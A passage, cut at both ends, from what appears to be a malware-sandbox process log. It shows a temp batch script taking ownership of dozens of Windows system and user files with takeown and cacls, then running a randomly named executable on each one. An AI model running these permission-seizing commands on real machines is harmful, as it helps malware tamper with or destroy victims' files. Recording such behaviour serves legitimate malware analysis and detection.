    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:3836
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    - Modifies file permissions
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"
    3⤵
    - Modifies file permissions
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
    3⤵
    PID:3348
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""
  2⤵
  PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"
    3⤵
    - Modifies file permissions
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
    3⤵
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl""
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl"
    3⤵
    - Modifies file permissions
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" -nobanner
    3⤵
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab"
    3⤵
    - Modifies file permissions
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:3836
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:3632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:3888
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:3344
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    - Modifies file permissions
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:64
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    - Modifies file permissions
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:3784
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\User\NotificationUx.4c2e3dc2-10c4-4fc4-9b5a-b543831eec4b.1.etl""
  2⤵
  PID:3464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\User\NotificationUx.4c2e3dc2-10c4-4fc4-9b5a-b543831eec4b.1.etl" /E /G Admin:F /C
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\User\NotificationUx.4c2e3dc2-10c4-4fc4-9b5a-b543831eec4b.1.etl"
    3⤵
    PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "NotificationUx.4c2e3dc2-10c4-4fc4-9b5a-b543831eec4b.1.etl" -nobanner
    3⤵
    PID:2984
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "NotificationUx.4c2e3dc2-10c4-4fc4-9b5a-b543831eec4b.1.etl" -nobanner
      4⤵
      PID:3760
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2""
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2"
    3⤵
    - Modifies file permissions
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "settings.dat.LOG2" -nobanner
    3⤵
    PID:3588
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "settings.dat.LOG2" -nobanner
      4⤵
      PID:2252
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "device.png" -nobanner
    3⤵
    PID:3356
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "device.png" -nobanner
      4⤵
      PID:2932
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:3452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:712
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:3924
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:3268
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:4052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    - Modifies file permissions
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:880
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:2420
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    - Modifies file permissions
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    - Modifies file permissions
    PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:2116
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" /E /G Admin:F /C
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl"
    3⤵
    - Modifies file permissions
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
    3⤵
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
      4⤵
      PID:3452
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
